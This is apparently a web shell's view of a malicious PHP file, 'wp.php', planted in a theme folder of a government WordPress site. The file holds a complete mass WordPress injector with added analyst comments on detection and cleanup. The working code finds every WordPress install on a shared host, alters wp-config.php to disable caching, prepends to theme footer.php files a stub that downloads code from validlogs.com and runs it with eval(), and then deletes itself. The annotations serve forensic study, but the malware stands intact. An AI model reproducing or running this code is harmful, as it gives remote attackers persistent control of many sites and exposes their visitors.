Warning: Constant SEO_LINKS_API_ENDPOINT already defined in /www/wwwroot/fni.gov.mz/wp-content/plugins/wordpress-plugin/wordpress-plugin.php on line 10
Server: Apache
System: Linux paginas.localdomain 4.15.0-200-generic #211-Ubuntu SMP Thu Nov 24 18:16:04 UTC 2022 x86_64
User: www (1002)
PHP: 8.0.11
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
File: /www/wwwroot/fni.gov.mz/wp-content/themes/wagrrop/wp.php
<?php
// Error-Proof Mass WP Injector - Individual Site Isolation
// Analyst note: turns off PHP error reporting and display, lifts the execution
// time limit and keeps the script running after the client disconnects, so the
// filesystem walk below finishes silently even if the triggering request is dropped.
error_reporting(0); ini_set('display_errors',0); set_time_limit(0); ignore_user_abort(1);

// New functions for comprehensive directory scanning
// Returns the realpath of the first candidate "hosting home" directory that
// exists and passes has_domain_folders(), or false when none does.
// Candidates: HOME (server variable and environment), the grandparent of the
// document root, a fixed list of shared-hosting roots, and per-user homes
// built from get_current_user().
// Analyst note: this is discovery of other sites on the same host. How far it
// reaches depends on filesystem permissions and any open_basedir restriction,
// neither of which is visible in this file.
function get_hosting_home_base() {
    $possible_homes = [
        $_SERVER['HOME'] ?? '',
        getenv('HOME'),
        dirname($_SERVER['DOCUMENT_ROOT']) . '/..',
        '/home', '/home1', '/home2', '/home3', '/home4', '/home5',
        '/home6', '/home7', '/home8', '/home9', '/home10',
        '/var/www', '/var/www/vhosts', '/usr/local/plesk/apache/vhosts'
    ];
    
    // get_current_user() reports the owner of this script file, which is not
    // necessarily the account the PHP process runs as.
    $user = get_current_user();
    if($user) {
        $possible_homes[] = "/home/$user";
        for($i=1; $i<=10; $i++) $possible_homes[] = "/home$i/$user";
    }
    
    // First match wins; later candidates are never examined.
    foreach($possible_homes as $home) {
        if(is_dir($home) && has_domain_folders($home)) return realpath($home);
    }
    return false;
}

// True when $dir has at least one immediate subdirectory whose name ends in one
// of the listed TLD suffixes or equals one of the usual web-root names
// (public_html, www, httpdocs, htdocs). Returns false when $dir cannot be listed.
function has_domain_folders($dir) {
    // Warnings from scandir() are suppressed; an unreadable directory is
    // simply treated as "no match".
    $items = @scandir($dir);
    if(!$items) return false;
    
    $domain_count = 0;
    foreach($items as $item) {
        if($item == '.' || $item == '..') continue;
        $full_path = $dir . '/' . $item;
        if(is_dir($full_path)) {
            if(preg_match('/\.(com|net|org|co|io|me|us|uk|au|ca|de|fr|it|es|nl)$/i', $item) ||
               in_array($item, ['public_html', 'www', 'httpdocs', 'htdocs'])) {
                $domain_count++;
            }
        }
    }
    return $domain_count > 0;
}

// Walks the immediate subdirectories of $home_base and returns a list of
// wp-load.php paths: one for a WordPress found directly in the subdirectory,
// plus any found under its web-root folders (searched with depth limit 3).
// Returns an empty array when $home_base cannot be listed.
// Analyst note: every path returned here is later written to by the main loop,
// so the result is effectively the set of sites to check during cleanup.
function scan_hosting_domains($home_base) {
    $wp_paths = [];
    $items = @scandir($home_base);
    if(!$items) return $wp_paths;
    
    foreach($items as $item) {
        if($item == '.' || $item == '..') continue;
        $domain_path = $home_base . '/' . $item;
        
        if(is_dir($domain_path)) {
            // Direct WP
            $direct_wp = find_wp_load_comprehensive($domain_path);
            if($direct_wp) $wp_paths[] = $direct_wp;
            
            // Web directories
            $web_dirs = ['public_html', 'www', 'httpdocs', 'htdocs', 'web', 'html'];
            foreach($web_dirs as $web_dir) {
                $web_path = $domain_path . '/' . $web_dir;
                if(is_dir($web_path)) {
                    $web_wps = scan_directory_comprehensive($web_path, 3);
                    $wp_paths = array_merge($wp_paths, $web_wps);
                }
            }
        }
    }
    return $wp_paths;
}

// Returns a de-duplicated list of starting directories: the script owner's home
// and public_html under /home and /home1../home10, plus /var/www/html.
function get_cpanel_common_paths() {
    $user = get_current_user();
    // Analyst note: the last entry is a hard-coded path naming a specific
    // account and domain. It looks like a leftover from another environment
    // (unconfirmed) and is a distinctive string to search for when hunting
    // copies of this file.
    $paths = ["/home/$user/public_html", "/home/$user", "/var/www/html", "/home/theligh1/domains/khaoded77.com/public_html"];
    for($i=1; $i<=10; $i++) {
        $paths[] = "/home$i/$user/public_html";
        $paths[] = "/home$i/$user";
    }
    return array_unique($paths);
}

// Returns glob patterns for common shared-hosting layouts (per-user domain
// folders, Plesk-style vhost trees, and any top-level */public_html).
// The patterns are only built here; find_all_wp_installs() expands them.
function get_hosting_patterns() {
    $user = get_current_user();
    return [
        "/home[0-9]*/$user/*/public_html",
        "/home[0-9]*/domains/*",
        "/var/www/vhosts/*/*",
        "/usr/local/plesk/apache/vhosts/*/*",
        "/*/public_html"
    ];
}

// Recursively collects wp-load.php paths under $dir.
// $max_depth bounds the recursion: a directory is examined while
// $current_depth <= $max_depth. $current_depth is internal bookkeeping.
// Returns an array of realpaths (possibly empty).
// Analyst note: the walk only reads directory listings, so it leaves no
// on-disk trace of its own; the writes happen later in the main loop.
function scan_directory_comprehensive($dir, $max_depth = 3, $current_depth = 0) {
    $wp_paths = [];
    if($current_depth > $max_depth || !is_dir($dir)) return $wp_paths;
    
    $wp_load = find_wp_load_comprehensive($dir);
    if($wp_load) $wp_paths[] = $wp_load;
    
    // Unreadable directories are skipped silently (warning suppressed).
    $subdirs = @scandir($dir);
    if(!$subdirs) return $wp_paths;
    
    foreach($subdirs as $item) {
        if($item == '.' || $item == '..') continue;
        $full_path = rtrim($dir, '/') . '/' . $item;
        if(is_dir($full_path)) {
            $sub_results = scan_directory_comprehensive($full_path, $max_depth, $current_depth + 1);
            $wp_paths = array_merge($wp_paths, $sub_results);
        }
    }
    return $wp_paths;
}

// Returns the realpath of $dir/wp-load.php when that file exists, else false.
// The indicator loop first checks for wp-load.php, wp-config.php or wp-content/,
// but only a present wp-load.php produces a non-false result.
function find_wp_load_comprehensive($dir) {
    $wp_indicators = ['wp-load.php', 'wp-config.php', 'wp-content/'];
    $has_wp = false;
    
    foreach($wp_indicators as $indicator) {
        if(file_exists(rtrim($dir, '/') . '/' . $indicator)) {
            $has_wp = true;
            break;
        }
    }
    
    if(!$has_wp) return false;
    
    $wp_load = $dir . '/wp-load.php';
    if(file_exists($wp_load)) return realpath($wp_load);
    
    return false;
}

// Modified find_all_wp_installs with fallback parent directory scanning
// Builds the full target list: a de-duplicated array of wp-load.php realpaths
// gathered from (1) the fixed common paths, (2) the expanded glob patterns,
// (3) the detected hosting home, and, only if all of those found nothing,
// (4) up to three directory levels above this script's own directory.
// Analyst note: the fallback means that a copy dropped inside a theme folder
// can still reach the WordPress install it sits in, and sibling installs under
// the same parent, even when none of the hosting-layout guesses match.
function find_all_wp_installs() {
    $all_wp_paths = [];
    
    // Get cPanel common paths
    $base_dirs = get_cpanel_common_paths();
    
    // Add paths from hosting patterns
    foreach(get_hosting_patterns() as $pattern) {
        $dirs = @glob($pattern, GLOB_ONLYDIR);
        if($dirs) $base_dirs = array_merge($base_dirs, $dirs);
    }
    
    // Add hosting home base
    $home_base = get_hosting_home_base();
    if($home_base) {
        $wp_paths = scan_hosting_domains($home_base);
        $all_wp_paths = array_merge($all_wp_paths, $wp_paths);
    }
    
    // Scan all base directories
    foreach($base_dirs as $base_dir) {
        if(!is_dir($base_dir)) continue;
        $wp_paths = scan_directory_comprehensive($base_dir, 5);
        if($wp_paths) $all_wp_paths = array_merge($all_wp_paths, $wp_paths);
    }
    
    // Fallback: Scan parent directories if no WP installs found
    if(empty($all_wp_paths)) {
        echo "No WordPress installations found in initial scan. Trying parent directories...\n";
        $current_dir = dirname(__FILE__);
        for($i = 1; $i <= 3; $i++) { // Check up to 3 parent levels
            $parent_dir = dirname($current_dir, $i);
            if(!is_dir($parent_dir)) break;
            echo "Scanning parent directory: $parent_dir\n";
            $wp_paths = scan_directory_comprehensive($parent_dir, 5);
            if($wp_paths) $all_wp_paths = array_merge($all_wp_paths, $wp_paths);
        }
    }
    
    return array_unique($all_wp_paths);
}

// Recursive wp-load.php search with the same structure as
// scan_directory_comprehensive(), but defaulting to depth 5 and using
// find_wp_in_current_dir(). Returns an array of realpaths (possibly empty).
// Analyst note: within this file the function is only called by itself, not by
// the main flow; it appears to be left over from an earlier variant.
function scan_directory_for_wp($dir, $max_depth = 5, $current_depth = 0) {
    $wp_paths = [];
    if($current_depth > $max_depth || !is_dir($dir)) return $wp_paths;
    
    $wp_load = find_wp_in_current_dir($dir);
    if($wp_load) $wp_paths[] = $wp_load;
    
    $subdirs = @scandir($dir);
    if(!$subdirs) return $wp_paths;
    
    foreach($subdirs as $item) {
        if($item == '.' || $item == '..') continue;
        $full_path = rtrim($dir, '/') . '/' . $item;
        if(is_dir($full_path)) {
            $sub_results = scan_directory_for_wp($full_path, $max_depth, $current_depth + 1);
            $wp_paths = array_merge($wp_paths, $sub_results);
        }
    }
    return $wp_paths;
}

// Returns the realpath of $dir/wp-load.php when it exists, else false.
// The body is the same as find_wp_load_comprehensive(); in this file it is
// referenced only from scan_directory_for_wp().
function find_wp_in_current_dir($dir) {
    $wp_indicators = ['wp-load.php', 'wp-config.php', 'wp-content/'];
    $has_wp = false;
    
    foreach($wp_indicators as $indicator) {
        if(file_exists(rtrim($dir, '/') . '/' . $indicator)) {
            $has_wp = true;
            break;
        }
    }
    
    if(!$has_wp) return false;
    
    $wp_load = $dir . '/wp-load.php';
    if(file_exists($wp_load)) return realpath($wp_load);
    
    return false;
}

// ULTRA-SAFE Cache Disable - No WP Functions
// Tampers with caching for the WordPress install rooted at $wp_dir.
// Returns false when wp-config.php is missing or unreadable, true otherwise.
// Two paths:
//   - wp-config.php lacks the string LSCWP_DISABLE_ALL and is writable: three
//     define() lines are appended and the function returns immediately.
//   - otherwise: top-level entries of wp-content/cache/ and cache/ are unlinked.
// Analyst note (detection/cleanup): look for the appended block that starts
// with "// Cache Disable - LiteSpeed" at the end of wp-config.php and for a
// changed modification time on that file. The return value does not reflect
// whether the write actually succeeded, so the "Caches disabled" line in the
// script's output is not proof of modification.
function disable_caches_ultra_safe($wp_dir) {
    // Only wp-config modification (no WP loading)
    $config_path = $wp_dir . '/wp-config.php';
    if(!file_exists($config_path)) return false;
    
    $content = @file_get_contents($config_path);
    if($content === false) return false;
    
    // Add LiteSpeed disable if missing
    if(strpos($content, 'LSCWP_DISABLE_ALL') === false) {
        $disable_code = "\n// Cache Disable - LiteSpeed\n";
        $disable_code .= "define('LSCWP_DISABLE_ALL', true);\n";
        $disable_code .= "define('WP_CACHE', false);\n";
        $disable_code .= "define('WP_ROCKET_IS_TAKING_CARE_OF_CACHE', false);\n";
        
        if(is_writable($config_path)) {
            // Whole file is rewritten with the block appended; result of the
            // write is discarded.
            @file_put_contents($config_path, $content . $disable_code);
            return true;
        }
    }
    
    // Clear obvious cache dirs
    $cache_dirs = [
        $wp_dir . '/wp-content/cache/',
        $wp_dir . '/cache/'
    ];
    
    foreach($cache_dirs as $cache_dir) {
        if(is_dir($cache_dir)) {
            // Non-recursive: only direct children are passed to unlink(), and
            // failures are suppressed.
            $files = @glob($cache_dir . '*');
            if($files) {
                foreach($files as $file) {
                    @unlink($file);
                }
            }
        }
    }
    
    return true;
}

// CRITICAL ERROR-PROOF Theme Injection
// Plants a remote-loader stub at the top of footer.php in the themes of the
// WordPress install identified by $wp_load (path to its wp-load.php).
// Returns true when at least one footer.php was written, false when the
// WordPress environment could not be loaded or nothing was written.
//
// Analyst note (impact): the stub stored in $inject_code fetches text from the
// hard-coded validlogs.com URL, with TLS peer verification switched off, and
// passes it to eval() each time footer.php is executed. What runs on the
// site is therefore chosen remotely and can change with no further change on disk.
//
// Analyst note (detection/cleanup):
//   - The substring 'validlogs.com' is the script's own "already infected"
//     marker and is a practical search string across theme directories.
//   - Themes that had no footer.php get a newly created one, so an unexpected
//     footer.php in a theme is itself an indicator.
//   - Installed themes are touched, not only the active one, so every
//     theme directory under wp-content/themes/ needs checking.
//   - Outbound requests from the web server to that host are a network-side
//     indicator that a planted stub has executed.
function inject_theme_safe($wp_load) {
    $wp_dir = dirname($wp_load);
    
    // ULTRA-SAFE WP Loading with full isolation
    if(!file_exists($wp_load)) return false;
    
    // Create isolated environment
    $old_abspath = defined('ABSPATH') ? ABSPATH : '';
    // NOTE(review): $old_wp_load is assigned but not read again in this function.
    $old_wp_load = defined('WP_LOAD_PATH') ? WP_LOAD_PATH : '';
    
    define('WP_LOAD_PATH', $wp_load);
    
    // Try multiple loading methods
    $wp_loaded = false;
    
    // Method 1: Direct include
    // Output buffering hides anything the target site prints while it boots.
    // Including wp-load.php executes the target site's own PHP code in this process.
    ob_start();
    if(@include_once($wp_load)) {
        if(function_exists('wp_get_themes')) {
            $wp_loaded = true;
        }
    }
    ob_end_clean();
    
    // Method 2: If Method 1 fails, try wp-config
    if(!$wp_loaded) {
        $config_path = $wp_dir . '/wp-config.php';
        if(file_exists($config_path)) {
            ob_start();
            if(@include_once($config_path)) {
                if(defined('ABSPATH') && function_exists('wp_get_themes')) {
                    $wp_loaded = true;
                }
            }
            ob_end_clean();
        }
    }
    
    if(!$wp_loaded) {
        echo "  ✗ WP environment failed to load\n";
        return false;
    }
    
    // Safe theme injection with multiple fallbacks
    // The string below is the payload written into footer.php (see the notes at
    // the top of this function).
    $inject_code = '<?php $u="https://validlogs.com/link1.txt";$ch=curl_init($u);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);$c=curl_exec($ch);curl_close($ch);if($c)eval("?>".$c); ?>';
    
    $injected = false;
    
    // Method 1: Standard wp_get_themes
    if(function_exists('wp_get_themes')) {
        try {
            $themes = wp_get_themes();
            foreach($themes as $theme) {
                $theme_dir = $theme->get_stylesheet_directory();
                $footer_file = $theme_dir . '/footer.php';
                
                if(!is_dir($theme_dir) || !is_writable($theme_dir)) continue;
                
                if(file_exists($footer_file)) {
                    $current = @file_get_contents($footer_file);
                    // Skip files that already contain the marker, so a repeat
                    // run does not stack a second copy of the stub.
                    if(strpos($current ?: '', 'validlogs.com') === false) {
                        // Stub is prepended; the original footer content follows it.
                        $new_content = $inject_code . ($current ?: '');
                        if(@file_put_contents($footer_file, $new_content)) {
                            $injected = true;
                        }
                    }
                } else {
                    // No footer.php yet: one is created containing the stub and
                    // a minimal footer, then set to mode 0644.
                    $footer_content = $inject_code . '<?php wp_footer(); ?>' . "\n</body></html>";
                    if(@file_put_contents($footer_file, $footer_content)) {
                        @chmod($footer_file, 0644);
                        $injected = true;
                    }
                }
            }
        } catch(Exception $e) {
            // Method 1 failed, try Method 2
        }
    }
    
    // Method 2: Direct theme directory scan (if WP functions fail)
    // Runs only when Method 1 wrote nothing; walks wp-content/themes/ directly.
    if(!$injected) {
        $themes_path = $wp_dir . '/wp-content/themes/';
        if(is_dir($themes_path)) {
            $theme_dirs = @scandir($themes_path);
            if($theme_dirs) {
                foreach($theme_dirs as $theme_name) {
                    if($theme_name == '.' || $theme_name == '..') continue;
                    $theme_dir = $themes_path . $theme_name;
                    if(!is_dir($theme_dir)) continue;
                    
                    $footer_file = $theme_dir . '/footer.php';
                    if(is_writable($theme_dir) && (!file_exists($footer_file) || is_writable($footer_file))) {
                        // A missing footer.php is created holding only the stub.
                        $current = file_exists($footer_file) ? file_get_contents($footer_file) : '';
                        if(strpos($current, 'validlogs.com') === false) {
                            $new_content = $inject_code . $current;
                            if(file_put_contents($footer_file, $new_content)) {
                                $injected = true;
                            }
                        }
                    }
                }
            }
        }
    }
    
    // Restore original environment
    if($old_abspath) define('ABSPATH', $old_abspath);
    
    return $injected;
}

// MAIN EXECUTION WITH FULL ERROR ISOLATION
// Driver: enumerates WordPress installs, then for each one alters wp-config.php
// / cache directories and plants the footer stub, printing a per-site log and a
// summary to whoever requested this script.
// Analyst note (forensics): the printed banner and "Processing:" lines go to the
// HTTP response, so they would not normally appear in server-side logs; the
// request for this script's path in the web server access log, and changed
// modification times on wp-config.php and theme footer.php files, are the
// durable traces. After a successful run the script deletes itself (see the
// end of this block), so its absence from disk does not indicate a clean host.
echo "=== Error-Proof Mass WP Injector ===\n";

$all_wp_installs = find_all_wp_installs();
echo "Found " . count($all_wp_installs) . " WordPress installations\n\n";

$total_processed = 0;
$total_injected = 0;
$total_caches_disabled = 0;

foreach($all_wp_installs as $index => $wp_load) {
    // $wp_load is the realpath of a wp-load.php; its directory is the site root.
    $wp_base = dirname($wp_load);
    $site_name = basename($wp_base);
    echo "[$index] Processing: $site_name ($wp_base)\n";
    
    // Isolate each site processing
    try {
        // Disable caches (ultra-safe, no WP loading)
        if(disable_caches_ultra_safe($wp_base)) {
            echo "  ✓ Caches disabled (wp-config)\n";
            $total_caches_disabled++;
        }
        
        // Theme injection (isolated WP environment)
        if(inject_theme_safe($wp_load)) {
            echo "  ✓ Themes injected\n";
            $total_injected++;
        } else {
            echo "  ✗ Theme injection failed (permissions?)\n";
        }
        
        $total_processed++;
    } catch(Exception $e) {
        echo "  ✗ CRITICAL ERROR - Site skipped: " . $e->getMessage() . "\n";
    }
    
    // Force cleanup between sites
    if(function_exists('wp_clean_theme_cache')) wp_clean_theme_cache();
    ob_end_clean();
    echo "\n";
}

// Final report
echo "=== SUMMARY ===\n";
echo "Total WP installs found: " . count($all_wp_installs) . "\n";
echo "Processed: $total_processed\n";
echo "Caches disabled: $total_caches_disabled\n";
echo "Themes injected: $total_injected\n";

// Self-removal: only when at least one site was modified and this file is
// writable. The planted footer stubs and wp-config.php edits remain.
if($total_injected > 0 && is_writable(__FILE__)) {
    unlink(__FILE__);
    echo "✓ Self-deleted\n";
}

echo "=== COMPLETE ===\n";
exit;
?>